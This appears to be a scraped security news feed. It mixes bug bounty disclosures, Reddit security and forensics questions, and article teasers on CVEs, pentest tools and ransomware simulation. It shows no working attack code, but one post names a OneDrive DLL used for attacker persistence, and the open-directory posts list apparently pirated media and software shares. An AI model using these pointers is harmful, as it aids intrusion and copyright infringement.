    Acronis disclosed a bug submitted by aplis: https://hackerone.com/reports/1719719 - Bounty: $1000
    Misconfigured build on websites "abuse.cloudflare.com"
    Cloudflare Public Bug Bounty disclosed a bug submitted by paradessia_: https://hackerone.com/reports/1624911 - Bounty: $100
    DoS of https://research.adobe.com/ via CVE-2018-6389 exploitation
    Adobe disclosed a bug submitted by shirshak: https://hackerone.com/reports/1511628
    IDOR [mtnmobad.mtnbusiness.com.ng]
    MTN Group disclosed a bug submitted by insomnia_hax: https://hackerone.com/reports/1698006

    Tenable.io vs. CSPM
    Wanted a simple explanation of whether Tenable.io (or .sc) can be replaced with a CSPM solution, or if there is a great reason to keep Tenable when going fully to the cloud. Is there a need for a network scanner in the cloud, or can I just point Wiz at my infra and figure out my vulnerabilities that way? submitted by /u/techwreck2020
    Learning curve for zeek
    I’m about to start a project utilizing Zeek. How difficult is it to use this product coming from limited Linux usage? What resources does this subreddit recommend to learn this tool? Thanks! submitted by /u/JoeyNonsense
    academy for internet research
    Does anyone know any details about academyforinternetresearch.org? Or can you point me to a blog post or podcast where they discuss their mission and legitimacy? The whois data shows the address for "Aloha Ship and Pack Mililani", a FedEx mail center, which is basically a front. They have their own AS, AS400161, which is comprised of two /24s, one in Hawaii and one in the Netherlands. I assume they do internet research, scanning for open vulnerabilities and portscanning the internet, for good I hope. I was hoping to understand the org and their mission a little more. submitted by /u/1hTD4eOyCrsJ
    Which job is best for my career? I received 2 offer letters and can't decide.
    I have been applying and interviewing at companies for the past month and I received 2 offers recently. I graduated 2 months ago and have around 1.5 years of experience interning in roles including Security (6 months SOC, 6 months Security Research) and DevOps (6 months). I have the CCNA and CEH, am currently preparing for the OSCP, and have a lot of knowledge in a couple of security domains. Studied and practiced mostly on HTB, THM, PortSwigger Academy, Udemy courses, homelab etc. CTC: the CTC is very similar for both companies and both have WFH and in-office (hybrid work). Both salaries are according to industry standards for my experience in India. Company 1: Big networking company, borderline Fortune 500; I will be joining the Incident Response team as a Security Engineer. Role: Member of International secu…
    NetSec: Any specific requirements or standards/policies for FL Doctors office?
    Hey everyone, and thanks in advance for any help. My question is whether anyone might know of, or could point me in the direction of, specific standards or policies that have to be followed by a medical/doctor's office in securing their network to protect patient files. I know HIPAA would be at play as well in this specific situation, but any tips or advice would be great. This is specifically related to the state of FL, even though I’m sure there’s a nationwide standard. submitted by /u/Shdwjokr
    Providing OpenID Connect as only login option
    For an internet service I'm developing, I'm looking into providing only OpenID Connect options for authentication. However, I find it difficult to assess whether that would keep out, or add friction to the enrolment of, some business users. Let's take an example:
    - Companies use Azure AD
    - My service accepts Microsoft as an IdP
    - My service allows login with the "Login with Microsoft" button.
    If a company uses Azure AD, does that mean that the "Login with Microsoft" button works out of the box, or can they disable it in some cases? That is, if I have a "Log in with Microsoft" button, do I cover all Azure AD users without exception, or would they have to explicitly set up an SSO integration? submitted by /u/pickled-munchkin
    How important is it to attend security conferences if you work in application security?
    How important is it to attend security conferences if you work in application security? submitted by /u/herbertisthefuture
    Keysight vision Tap/agg question
    I will be working with a Vision X box in the next few months to work on monitoring traffic. What are some best practices from those who have used this product? What are some things you wish you had known beforehand? What recommendations do you have for using packet processing? What recommendations do you have for using AppStack processing? The tools that will potentially be used are Suricata or Zeek; haven’t decided which system yet. Sorry if this is all over the place. Any and all information would be greatly appreciated! submitted by /u/JoeyNonsense

    PiRogue Tool Suite: Mobile forensic & network analysis on a Raspberry Pi
    submitted by /u/ResponsibleCat
    How to Investigate Insider Threats (Forensic Methodology)
    submitted by /u/CyberMasterV
    RPC Toolkit - security research oriented resources on MS-RPC (articles, PoCs, vulnerability write-ups, tools, etc.)
    submitted by /u/ophirharpaz
    SafeSetID - a Linux Security Module (LSM) you should know about
    submitted by /u/boutnaru
    Private npm Packages Disclosed via Timing Attacks
    submitted by /u/mkatch
    Bringing passkeys to Android & Chrome
    submitted by /u/Khryse

    It’s the Little Things : Breaking an AI
    Get yourself a rooted Android Virtual Device (AVD)
    Server Hardening with OpenSCAP
    TryHackMe writeup: Tools R Us
    ToolsRUs (“tryhackme”, 2019) is a fun little TryHackMe room that has its users “[p]ractise using tools such as dirbuster, hydra, nmap… Continue reading on InfoSec Write-ups »

    Awesome Hacker Search Engines
    I've recently updated the GitHub repo containing search engines and online services useful for pentesting, general security, red team, bug bounty etc. Now it contains a lot of resources. This is the link: https://github.com/edoardottt/awesome-hacker-search-engines submitted by /u/edoardottt
    lmao
    submitted by /u/ApepeApepeApepe
    Pivoting Over Challenge Based Enterprise WiFi Network
    submitted by /u/tbhaxor
    Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE)
    Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE). Updated video tutorial! https://github.com/freeload101/Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy Want to pentest or run Android apps in minutes? Sick of BlueStacks or NOX malware/adware? Not a single binary in this script; it's open source and downloads are direct from proper sources. There are lots of great PowerShell tricks (not great code) in this script. I worked hard on things like:
    - making it as portable as possible
    - setting up and downloading an extremely fast environment for Android, Java and Python
    - converting SSL certs to Android without openssl, using certutil.exe only
    I would like to make it even easier to use, but I don't want to spend more time developing it if nobody is going to use it, so please let me know if you like it and open bugs/suggestions/feature requests etc.! If you're a mod about to remove this post, can you do me the kind pleasure of telling me why and how I can help the community better? Please let me know. submitted by /u/rmccurdyDOTcom
    Cobalt Strike - OneDrive DLL injection
    Advanced Persistent Threat (APT) and ransomware threat actors are targeting more legitimate software used in global companies, like default backup solutions such as Microsoft OneDrive. When investigating the missing OneDrive DLLs with ProcMon, the file "cscapi.dll" is loaded from "C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive". This allows threat actors to gain persistence when the end user opens OneDrive, since the DLL will be loaded into the process. https://youtu.be/bs_fMlw6DvE submitted by /u/EpicOfAllEpics

    Project ideas
    Hi everyone! I'm a final year student of Digital Forensics and Cyber Security, and I need to work on a year-long project, possibly related to the subject of my degree. I have been thinking of Network Forensics; as my aim is to become an Incident Responder one day, going through the various SOC levels, I thought that working on PCAPs of a compromised network might be good to showcase to a future employer. Now, what I can't get my head around is how I could structure an investigation into a project that has the aim of finding a solution to a problem. And on top of that my degree requires code/scripting, no matter how many lines, as long as there's a programming language involved and the creation of an artefact. I'm familiar with Python; however, I'm still unsure how I could use it for this specific purpose (many tools and libraries already use Python) and come up with something innovative. If someone more experienced has any tip or advice, that would be really appreciated. Hope this post makes sense; otherwise please do ask questions if needed. Thank you very much in advance. submitted by /u/Pnigalion_
    The Linux Process Journey — PID 0 (swapper)
    submitted by /u/boutnaru
    Using FTK Imager for ISO used by Autopsy
    Good day. I am using a Kali Linux Live USB to run FTK Imager on a Windows 10 machine. My goal is to make an image of the host machine and run it through Autopsy for processing. My core issue is the CLI for FTK Imager: I can't seem to find docs related to the image format options. I know I can use "--e01" for an EnCase format, but I am not sure if that will work with Autopsy or if there is a better option that exists. Any help, bros... and bro-ettes? submitted by /u/CyberSaintZero
    GCFA
    Does anyone happen to know if there is any word on when a new GCFA will come out? Looking to take the GCFA but don't want to take it if there's a chance there will be a revamp relatively soon. submitted by /u/DeadBirdRugby
    why an acquisition hash would be the same sometimes?
    Sorry for the noob question, I'm trying to understand why an acquisition hash would be the same in some cases and why it would be different in others. I tried modifying an evidence file and the acquisition hash stayed the same. I tried the same thing with a different evidence file and the acquisition hash changed, and it's now different from the original file. Either my EnCase is glitching up or I got myself confused lol. submitted by /u/shalnark90
    SANS course question
    Taking the SANS FOR500 course and making an index. When I’m done with the index, what should I bring to Staples to have them bind it? All of the workbooks I received? I've never done it, so just looking for some help! Also, if anyone has any good tips/recommendations for indexing, please drop them. submitted by /u/Ok_Cockroach8022

    PSRansom — Ransomware Simulation with C2
    PSRansom is a script written in PowerShell that lets you simulate how a piece of ransomware operates. It is a script you can use to… Continue reading on 100security »

    How to Securely Debug WordPress Errors on Your Website
    While working on or maintaining your WordPress website, you’ll inevitably encounter an error that prevents it from properly functioning. Knowing how to securely debug and troubleshoot WordPress is an exceptionally important skill. But there’s one important step you’ll want to take to prevent sensitive data exposure on your website. In this article, we’ll explore how to securely check and debug errors on WordPress so you can quickly (and safely) spot problems on your site. Continue reading How to Securely Debug WordPress Errors on Your Website at Sucuri Blog.

    SecWiki News 2022-10-13 Review
    The CRLF you didn't know about: the vulnerability hidden in headers, by 蓝色淡风
    A simple analysis of 56k xray results, by ourren
    Notes on Google's cloud infrastructure security design, by ourren
    A summary of ways to obtain domain user hashes, by ourren
    For more recent articles, visit SecWiki

    OSINT in Metaverse
    To comprehend OSINT in the metaverse, we must first understand what these two terms mean. OSINT stands for Open-Source Intelligence. It… Continue reading on Medium »

    Two ways to attack the RMI Registry
    Overview: RMI (Remote Method Invocation) lets a program running on a client invoke objects on a remote server over the network. To implement RMI, the client and server need to share the same interface. Basics: the Client and Registry communicate via a Stub and a Skeleton, corresponding to the RegistryImpl_Stub and RegistryImpl_Skel classes respectively. Example: an interface that can be invoked remotely, implementing R
    “Third Brother”, the leaking of nucleic-acid test data needs to be reined in!
    Once nucleic-acid test data leaks, the public is effectively left “naked”, which brings many obstacles to work and daily life.
    FreeBuf Morning Report | MIIT names 38 apps that infringe users' rights; India's 5G network sparks all kinds of online scams
    Mumbai police in India have issued a warning about 5G-related scams, in which fraudsters deceive users by offering guidance on upgrading to a 5G connection.
    Heard that security people are under huge pressure?
    Have you been feeling a lot of pressure lately?
    Nmap packet-capture analysis and bypassing the Windows Firewall
    This article covers: 1. Nmap packet-capture analysis; 2. scanning for live hosts on an internal network while bypassing the Windows Firewall.
    Top 10 CI/CD security risks (Part 4)
    In this article we look at insufficient credential hygiene and insecure system configuration, and give corresponding risk-mitigation recommendations.
    Notes on an internal-network lab penetration test (Part 2)
    This week we share how to use CS to attack the lab range, and describe how golden tickets are used.
    A guide to internal phishing-email drills for enterprises
    Recently the 天翼云 (Tianyi Cloud) Security Lab ran an internal phishing-email drill and summarized some technical lessons from it.
    When we talk about mini-program security, what are we talking about?
    Security research on mini-program technology is both an exploration of fundamental security problems and a study of the security of what makes mini-programs unique.

    Set Up an Android Hacking Lab for $0
    With the ever-increasing demand for mobile technology, it seems like there is an app to do just about anything you can think of, right on your cell phone. From banking to mobile gaming and even controlling the RGB lights installed in your home office, everything is interconnected now. With the rise of this functionality also... The post Set Up an Android Hacking Lab for $0 appeared first on TrustedSec.

    CVE-2022-25237 Bonitasoft Platform RCE vulnerability analysis
    Author: xxhzz@星阑科技PortalLab Original link: https://mp.weixin.qq.com/s/zGDZeG3_lz5IdJ-V4zZjhg Project introduction: Bonitasoft is a business automation platform that makes it easier to build, deploy and manage automated applications within business processes; Bonita is an open-source, extensible platform for business process automation and optimization. Vulnerability description: In the Bonitasoft Authorization vuln...

    Fact Check — Libyan Airlines Workers Protesting?
    Workers to protest outside Libyan Airlines office in Tripoli, Libya, Oct. 11. Increased security, localized transport disruptions likely. Continue reading on The Sleuth Sheet »
    Malaysian OSINT resource list guide
    In Malaysia even ASEAN, there is no one to compile resources locally like in Canada, South Africa, Australia, and Poland. Even researchers… Continue reading on Medium »
    My Second-“Dual”-Brain
    Basically, I’m literally trying to be the galaxy-brain meme. Continue reading on Medium »

    The Open Cloud Vulnerability and Security Issue Database
    Article URL: https://www.cloudvulndb.org/ Comments URL: https://news.ycombinator.com/item?id=33185197 Points: 2 # Comments: 0

    [NSFW] Movies, TV Shows, Music, Documents, eBooks
    http://library.metergroup.com/ - Irrigation & Water meters manuals, pamphlets, papers, etc.
    https://www.bon.texas.gov/pdfs/ - Texas Board of Nursing documents
    https://floridasoccupationaltherapy.gov/meetings/ - Florida Dept. of Health meeting documents
    https://warrickcounty.gov/Election/ - Warrick County, Indiana Election Documents
    https://documents.cabq.gov/ - Documents from the city of Albuquerque
    https://www.fsis.usda.gov/shared - Documents from the USDA Food Safety & Inspection Service
    https://www2.census.gov/ - Documents & Software from the U.S. Census
    http://www.emporia-kansas.gov/files/ - Documents from Emporia, KS
    https://satcomm911.com/PDFS/ - (political) Ton of documents, pamphlets, propaganda
    https://irctrax.net/ - (political) eBooks, documents
    https://www.cchfreedom.o…

    SiteCheck Malware Trends Report – Q3 2022
    Our free SiteCheck remote website scanner provides immediate insights about malware infections, blocklisting, website anomalies, and errors for millions of webmasters every month. Best of all, conducting a remote website scan is one of the easiest ways to identify security issues. While remote scanners may not provide as comprehensive of a scan as server side scanners, they allow users to instantly identify malicious code and detect security issues on their website without installing any software or applications. Continue reading SiteCheck Malware Trends Report – Q3 2022 at Sucuri Blog.

    Security is not in your fingerprint.
    How I bypassed a biometric security control using the Flipper Zero Continue reading on Medium »

    SecWiki News 2022-10-12 Review
    AWS S3 Bucket subdomain takeover enabling a trusted phishing service attack, by ourren
    For more recent articles, visit SecWiki

    $6000 with Microsoft Hall of Fame | Microsoft Firewall Bypass | CRLF to XSS | Microsoft Bug Bounty
    Critical IDOR Vulnerability on Medium?

    CVE-2022-2992 – Remote Command Execution in Gitlab via GitHub Import
    Article URL: https://github.com/CsEnox/CVE-2022-2992 Comments URL: https://news.ycombinator.com/item?id=33178487 Points: 1 # Comments: 0
    Vuln in Vm2 Sandbox Module Enables Remote Code Execution (CVE-2022-36067)
    Article URL: https://www.oxeye.io/blog/vm2-sandbreak-vulnerability-cve-2022-36067 Comments URL: https://news.ycombinator.com/item?id=33176479 Points: 1 # Comments: 0

    Subdomain Enumeration Tool Face-off 2022
    submitted by /u/the-techromancer
    A deep dive into CVE-2021–42847 - arbitrary file write and XXE in ManageEngine ADAudit Plus before 7006
    submitted by /u/kalibabka
    Cerberus Stress Testing Tool
    submitted by /u/fficarola
    Kubernetes CRD validation with CEL and kubebuilder marker comments
    submitted by /u/Rewanth_Tammana
    Userland Execution of Binaries Directly from Python
    submitted by /u/anvilventures
    postMessage Braindump - a brief postMessage testing methodology
    submitted by /u/Gallus

    Janus
    submitted by /u/noncriticalthinker
    Analysing LastPass, Part 1 - @MDSecLabs
    submitted by /u/dmchell
    Pivoting Over TTLS-PAP WPA Enterprise Networks
    submitted by /u/tbhaxor

    Recon ITR vs Digital Evidence Collector
    Deciding between the two, but Cellebrite hasn't gotten back to me yet. What's the difference? Which do you like? Is there a price difference and is it worth it? submitted by /u/CrazyKitty2016
    Add sticky post for career advice?
    I’m always happy to point new examiners in the right direction, but it seems like there have been a lot of new posts regarding education/career advice. Could we make this a sticky on our Reddit page? Some of these answers can easily be researched at this point. submitted by /u/hotsausce01
    What are the most useful sources to learn from?
    I'm not sure if this post is against the rules. If it is, feel free to remove it. I apologize. I'm fairly new to computer forensics. I've only watched some videos and read some articles, and started reading Computer Forensics InfoSec Pro Guide. I would really appreciate it if you guys could recommend me some interesting material to watch or read. It could be books, articles, videos, etc. submitted by /u/Dependent_Option_487

    How to Hack Browser Extension
    🔍 Introduction
    Browser extensions are a feature that lets users customize a web browser and extend what it can do. All the major browsers (Chrome, Safari, Firefox, Edge) support them, and Chromium-based browsers (Brave, Whale, etc.) support extensions in the same way. This document summarizes how to test such browser extensions and find security problems in them.
    Structure
    Chrome/Firefox Extension: Chrome and Firefox basically share the same extension structure, so mutually compatible extensions exist. However, as versions have progressed they now have slightly different handling structures, so there are many cases where they are not compatible.
    Safari App Extension: Unlike the Web Extensions used by Chrome and Firefox, a Safari app extension is an application built from Swift code. The actual internals are quite different, but in the end it likewise exerts control from inside the DOM with some JavaScript and HTML, so it can be checked the same way in the testing methods below.
    Safari Web Extension: A Safari Web Extension has the same form as the Web Extensions used by Chrome/Firefox. The way to tell an App Extension from a Web Extension is the installation method. App Extension: installed only through the App Store. Web Extension: file-based installation, the same as Chrome.
    API Documents
    Chrome: https://developer.chrome.com/docs/extensions/reference/
    Firefox: https://developer.mozilla.org/en-US/docs/Mozilla/Add-ons/WebExtensions
    Safari App Extension: https://developer.apple.com/documentation/safariservices/safari_app_extensions
    Web Extension: https://developer.apple.com/documentation/safariservices/safari_web_extensions
    🗡 Hack Mechanism
    Although each browser works differently internally, the scope of what they do is ultimately similar, so all browser extensions can be tested and their security problems found in a similar way.
    Code audit: Since a browser extension is a ZIP file, you can download it, unpack it, and examine the source code and resources...

    Analysis of the Java implementation of the JEP 290 mechanism
    How JEP 290 is implemented in Java
    2022 Industry Watch | Ransomware's sharp “spear”: vulnerability weaponization
    We found that ransomware-as-a-service (RaaS) is maturing, old malware variants are returning, new variants keep evolving, vulnerabilities are increasingly weaponized, and the ransomware ecosystem is gradually industrializing.
    FreeBuf Morning Report | Eight unexpected ways data gets leaked; a VMware vulnerability still unpatched after a year
    An APT group called Polonium is using new custom backdoors and tools to conduct espionage against Israel.
    SharkTeam: Move contract development and contract security
    Recently, the emerging high-performance L1 chains Aptos and Sui, and the Move smart-contract programming language behind them, have drawn a lot of attention; the community is very active, and many developers and projects have started actively moving to Move.
    Revisiting Spring memory-resident webshells: Interceptor (Memory Webshell Series, Part 10)
    Today we continue studying memory-resident webshells in the Spring framework, this time built using the Interceptor mechanism.
    Almost a year on, this VMware vulnerability is still unresolved
    On October 11, VMware notified customers that vCenter Server 8.0 is still awaiting a patch for the high-severity privilege-escalation vulnerability disclosed last November.
    Residual heat on keyboards can leak passwords: a thermal image taken within 20 seconds recovers 86% of passwords
    When the thermal image is taken within 20 seconds, the password recovery rate is 86%; within 30 seconds, 76%; within 60 seconds, 62%.
    Top 10 CI/CD security risks (Part 3)
    In the previous article we looked at two major security risks, dependency chain abuse and insufficient pipeline-based access controls, and gave recommendations for mitigating them. This article focuses on the PPE risk and provides recommendations and practices for mitigating it. Poisoned Pipeline Execution (PPE) refers to an attacker who has access to the source code management system but not to the build environment manipulating the build process by injecting malicious code/commands into the build pipeline configuration; in essence, a “poisoned” pipeline running malicious code as part of the build

    Pwning ManageEngine — From Endpoint to Exploit
    A deep dive into CVE-2021–42847 Continue reading on Medium »

    Broken Access Control leads to full team takeover and privilege escalation
    Hello all, Continue reading on Medium »
    Critical IDOR Vulnerability on Medium?
    Hello Guys, Continue reading on InfoSec Write-ups »
    IP Address takes you to the friend’s machine
    Understanding IP addresses completely in one article Continue reading on Medium »
    CVE-2022–41040 Microsoft Exchange vulnerable to server-side request forgery
    Overview: Continue reading on Medium »
    HOW A SLOW INTERNET GOT ME $50
    Hellooo there to all my fellow hackers and readers, as promised I’m back with another writeup, and this one is going to be very interesting! Continue reading on Medium »

    We Need Cybersecurity Mentors
    I received a job description from a recruiter recently, along with the request that if I knew anyone who fit the bill and was interested, could I please forward the job description to them. The recruiter was looking for someone at an entry-level, with 1 - 3 yrs of experience, and the listed salary was for a low six-figure salary. However, the list of Essential Skills were (copy-paste, with a few modifications): - Practical mobile phone forensic analyst skills on hardware and software. - Ability to run network and sandbox analysis on Windows, Linux, Mac, Android, iOS, and other platforms. - Ability to use compliers[sic] and other software analytical tools for different platforms. - Strong in tools such as and other analysis tools. - Strong TCP/UDP/IP networking and protocol …

    Am I the only one struggling with authentication?
    I'm having a hard time with authentication when performing a penetration test. Every tool I use cannot bypass the login form the easy way; with most of the tools I use, it seems the scan is unsuccessful and not internal because of the authentication. How do you guys do it, for example with gobuster, nuclei or kiterunner? Is there any way to log in successfully and do the scan? There are only a few tools, like sqlmap, where you can dump the whole request from Burp and just select which parameter you want to test. submitted by /u/tryingtoworkatm
    When to publicly disclose a vulnerability?
    Hi AskNetsec, I identified and reported a vulnerability in a website to people who knew the website managers. They were all very professional and appreciative of the fact that I responsibly disclosed the vulnerability. It's almost 2 months since I first reported the issue to them and it has still not been fixed. I am not sure if 90-day full disclosure would be applicable. Just wanted to know your thoughts 💭 Thanks submitted by /u/zer0byt3

    CVE-2022-24112 Apache APISIX remote code execution vulnerability
    Author: 李安@星阑科技PotalLab Original link: https://mp.weixin.qq.com/s/bbfFFczkycYCpRK0b7HeHg Vulnerability description: An attacker can send requests to the batch-requests plugin to bypass the IP restriction on the Admin API. Apache APISIX's default configuration (with the default API key) is vulnerable to remote code execution. When the admin key has been changed, or the Admin API port has been changed to one different from the data plane, the impact is smaller...

    200,000 subscribers!
    Well done r/opendirectories submitted by /u/MyClothesWereInThere
    [GDRIVE] [NSFW] Movies, TV Shows, Software, Games
    https://drive.google.com/drive/folders/1Fa0E3128_Fq0UTCtHmctLFYdK7BNsH0O - Movies, Games, Software, Emulators, Roms
    https://drive.google.com/drive/folders/0B1j88lrqI04bUzQ5MUlpanhDMlk?resourcekey=0-OqE5HBgH60o5IKFQgJje7w - XMAS Movies
    https://drive.google.com/drive/folders/1Jh4e2H_mHs4j0jKjtke0ELeBey-MF2Hd - Movies
    https://drive.google.com/drive/folders/0BzL6M5WpOxAdUW1ON2RwWS1YZk0 - Movies
    https://drive.google.com/drive/folders/1Ilc5VJiA_p38Ngdeq2Ec9HFQlhaMlBSf - Massive shared folder...some legit movies, shows, and software but also a bunch of empty folders.
    https://drive.google.com/drive/folders/0Bx5ZmUC6oIw6eEViQTVUVVRBRFU - Shoutout to /r/TwinPeaks, fan fiction content entries
    https://drive.google.com/drive/folders/0B4gMc2uxf1mxNzVVWlpjLXFOeFk - Atari ROMs
    https://drive.google.…
    Movies, TV Shows, Music, Audiobooks, Ebooks
    http://212.66.58.15:88/ - TV Shows, Movies
    http://158.69.224.17/serie/ - TV Shows
    https://zfelleg.useribm.hu/videos/ - TV Shows, Movies
    http://158.69.224.17:88/movie/ - Movies
    http://tokopsa.com:100/MUSIC/ - Music
    http://plaza.ufl.edu/dunna/ - Music (Justin Timberlake's album FutureSex [2006])
    http://plaza.ufl.edu/einalem/ - Music, Pictures of concepts for devices
    http://penguinradio.dominican.edu/ - Music, Sound FX, School sports commentary
    http://www.geo.mtu.edu/volcanoes/boris/ - Music & Volcano stuff
    https://spacegrant.colorado.edu/COSGC_Files/ - Music, educational powerpoints, NASA docs, random documents (From a Thread/Screw Drill & Tap sizes guide to how a "clean room" works)
    http://www.salixa.com/trh/ebooks - Ebooks (music and films available via web interface in parent directory)
    http://www.downloads.imune.net/medicalbooks/ - Medical pamphlets & ebooks
    https://zfelleg.useribm.hu/unsorted/ - Audiobooks/Ebooks
    https://www.uvm.edu/~gpetrucc/courses/ - Chemistry ebooks, papers, and syllabus
    submitted by /u/JasonSec
    Huge collection of Windows software and other Windows stuff.
    https://dl.malwarewatch.org submitted by /u/ilikemacsalot
    Medical, why not...
    Before-After... submitted by /u/xanderTgreat
    Birds, Fish Etc...
    All images of sea creatures... Think octopi are fu@ked up floppy fish... Link... submitted by /u/xanderTgreat
    Google CSE to find stuff
    Slack / Discord / Zoom invite search: https://cse.google.com/cse?cx=8e26eca532ec2cba3
    Instructables / Scribd / Academia: https://cse.google.com/cse?cx=4ea1b339b2e989c6d
    Search by filetype: https://cse.google.com/cse?cx=013991603413798772546:mu-oio3a980#gsc.tab=0
    submitted by /u/shawnpetry

    On Bypassing eBPF Security Monitoring
    submitted by /u/nibblesec
    The Fresh Phish Market: Behind the Scenes of the Caffeine Phishing-as-a-Service Platform
    submitted by /u/CyberMasterV
    Uncovering Siemens SIMATIC S7-1200/1500 Hardcoded Cryptographic Keys in PLCs
    submitted by /u/derp6996

    Remote collection off network..
    Has anyone tried off-network remote collection for Magnet Axiom Cyber? Magnet shows how to do it using AWS, but my shop doesn't like the added cost of the instance, data transfer, etc. Couldn't you just create a public-facing virtual machine, install Axiom on that and use it instead? submitted by /u/Inevitable_Logging
    Do I need to keep old Cellebrite Inspector and Blacklight versions for backward compatibility?
    I inherited a machine with Blacklight 2020 R1, Blacklight 10.2, and Cellebrite Inspector 10.6 on it. Would 10.6 be able to open cases created from the older versions? Or do I need to keep all of them? submitted by /u/vacathrowaway789

    OHSINT CHALLENGE ON TRYHACKME
    Explanation and understanding of the OhSINT Challenge Continue reading on Medium »
    Network Footprinting With Maltego
    How to Use Maltego Transforms to Map Network Infrastructure: An In-Depth Guide Continue reading on The Sleuth Sheet »
  • Open

    How do you install an .msi remotely without giving away admin creds?
    On demand task so not looking for GPO, RMM, SCCM, MDM, etc. solutions. Ideally using psexec or PowerShell, but open to any ideas. It's to apply to many machines. For example if there is an incident and you need to push an MSI out immediately without all the restart hassle or paying for a solution, I would have thought there'd be a secure way. Don't mind scripting for repetition across domain. Thanks in advance! submitted by /u/syswww [link] [comments]
    Seniors want to get rid of the SOC, to save money!
    This is a very silly question but I want some input from people who work in security. We have an external SOC as a service (we are a fintech). I'm the only internal security person on the team; all others are developers, platform engineers, etc. The boss told me we don't need a SOC, it's too much money, and all the other engineers can do what the SOC does. (The other engineers do not have any security training.) We will pay them extra to come on call and resolve the alerts. I have tried to convince the seniors this is a very bad idea but they think we are wasting too much money on the SOC analysts. What are your thoughts on this? Should I let it be or try to convince them to keep the SOC? Personally it will also increase a lot of work for me since the other engineers have no idea of security concepts from my experience. Thanks. submitted by /u/Hinata778 [link] [comments]
    How is Open Mobile API (OMAPI) different from Android Keystore API+Android StrongBox?
    Hi, They both are used to store secure keys on the Secure Element (SE). I heard that Android Keystore API is used to access SE basic functionality (i.e., to use it only as a container to store keys): Keystore talks to -> StrongBox, which talks to -> SE. However, to access SE's advanced functionality one needs to use Open Mobile API (OMAPI), which talks to SE. Is the above-said correct or do I misunderstand something? submitted by /u/LSDwarf [link] [comments]
    Why is 2001:0db:8:0:0:0:0:1428:57:ab a valid IPv6 address?
    I am doing some IPv6 study and a question came up, to which the answer was that 2001:0db:8:0:0:0:0:1428:57:ab is a valid IPv6 address. I assume there is some simple thing I am overlooking but I count ten hextets there so am confused. Thanks submitted by /u/WhichKey1 [link] [comments]
  • Open

    Autofill/Autosave password on login
    Yelp disclosed a bug submitted by zero_990: https://hackerone.com/reports/1720621
  • Open

    SecWiki News 2022-10-11 Review
    Power grid network security zoning (4+1+1 zones) by ourren; Easily identifying malicious servers on the Internet with JARM by ourren; SecWiki Weekly (Issue 449) by ourren; Quantitative calculation methods in the vulnerability management process by ourren; Code Analysis With Joern by lightless. For more of the latest articles, visit SecWiki
  • Open

    grep.app — Search strings on GitHub
    grep.app lets you run a broad string search across many GitHub repositories; it is an additional platform that… Continue reading on 100security »
    unfurl — Extract and Visualize data from URLs
    Using Unfurl you will be able to extract important data from a URL, search engines, chat apps, sites for… Continue reading on 100security »
    GooFuzz — The Power of Google Dorks
    GooFuzz is a script written in Bash that uses advanced Google search techniques to obtain confidential information from… Continue reading on 100security »
    What does red teaming mean in hacking or pen testing?
    The aim of pen-testing is to locate as many possible security threats and flaws as possible. On the other hand, the purpose of red teaming… Continue reading on Medium »
    unfurl — Extract and Visualize data from URLs
    Using Unfurl you will be able to extract important data from a URL, search engines, chat apps, sites for… Continue reading on Medium »
    File transfer methods in penetration tests
    During penetration tests, CTFs or certification exams, after obtaining remote code execution (RCE), privilege escalation… Continue reading on Medium »
  • Open

    Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene—Part 2
    In the first Back to Basics blog we discussed cyber hygiene and some fundamental security practices one can take to quickly assess their current cybersecurity posture and identify, prioritize, and mitigate visibility gaps. This post focuses on account management measures and how proactive identification and regulation can drastically elevate your security posture. Routine cyber hygiene... The post Back to Basics: The TrustedSec Guide to Strong Cyber Hygiene—Part 2 appeared first on TrustedSec.
  • Open

    The Canary protection mechanism and how it is bypassed
    This article shares some study notes on the Canary protection mechanism and how it is bypassed, for everyone's learning.
    FreeBuf Morning Report | Qihoo and DJI blacklisted by the US; UK establishes a "Defence Cyber Academy"
    The Pentagon has blacklisted 13 Chinese companies, including Qihoo 360, Shenzhen DJI, Beijing Knownsec and Sugon.
    "Information Security Technology: Basic Security Requirements for Pre-installed Smartphone Applications (Draft for Comment)" released
    The Security Requirements set out basic security requirements for pre-installed smartphone applications; they apply to the production activities of smartphone manufacturers and can also serve as a reference for regulatory and third-party assessment work.
    Top 10 CI/CD Security Risks (Part 2)
    Dependency chain abuse risk refers to an attacker abusing flaws in how software development workstations and build environments fetch code dependencies, so that a malicious package is unintentionally pulled and executed locally.
    Customize a CIS 2022 iced cola and get a merchandise gift pack
    Come write your custom slogan, and receive FreeBuf merchandise gifts~
    Multiple US airports suffered outages due to cyberattacks; is Russia involved?
    The pro-Russian hacker group "KillNet" claimed responsibility for distributed denial-of-service (DDoS) attacks on the websites of several major US airports.
  • Open

    Find xss using automated tools with real target.
    Hello hackers! Today I will show you some useful tools used to scan for XSS vulnerabilities in web applications. Continue reading on Medium »
    60K+ User Credentials, ₹ 1million+ Manipulation due to..
    Hey! Yo! Namaste! 😁 It's me Shivam Gupta [Rawnge] an Aspiring Indian Cybersecurity Officer. Continue reading on Medium »
    Announcing the XSPO bug bounty program
    Today we are announcing the launch of the Xfinite Staking Program Offering (XSPO) bug bounty program for anyone and everyone interested Continue reading on Medium »
    OSCP Cheat Sheet
    OSCP Cheat Sheet Continue reading on Medium »
    Help us make SO-COL better (and get rewarded!)
    Here we are at our final round of testing, open to everyone in the public. Continue reading on Medium »
    $10,000 Prize Pool in SO-COL’s Bug Bounty
    SO-COL Community Management Platform launch is round the corner and we have completed two rounds of early user testing. Alongside our user… Continue reading on Medium »
    Why do Deserialization Vulnerabilities occur?
    Introduction Continue reading on InfoSec Write-ups »
    What Have Recent Ransomware Attacks Taught Us?
    Recent ransomware attacks have brought to the attention of organisations that there is an increasing need to improve their systems and… Continue reading on Medium »
    IDOR + Broken Access Control.
    Note: No data was recorded, leaked or altered; the intent is educational, for the community and professionals in the field of Security… Continue reading on Medium »
    Network Footprinting With Maltego
    How to Use Maltego Transforms to Map Network Infrastructure: An In-Depth Guide Continue reading on The Sleuth Sheet »
  • Open

    HTML attachments have become a common technique in malicious email
    Author: Rodel Mendrez; Translator: Knownsec 404 Lab Translation Team; Original link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/html-file-attachments-still-a-threat/ Introduction: Over the past month, Trustwave SpiderLabs has observed that HTML (Hypertext Markup Language) files have become a common means of malicious e...
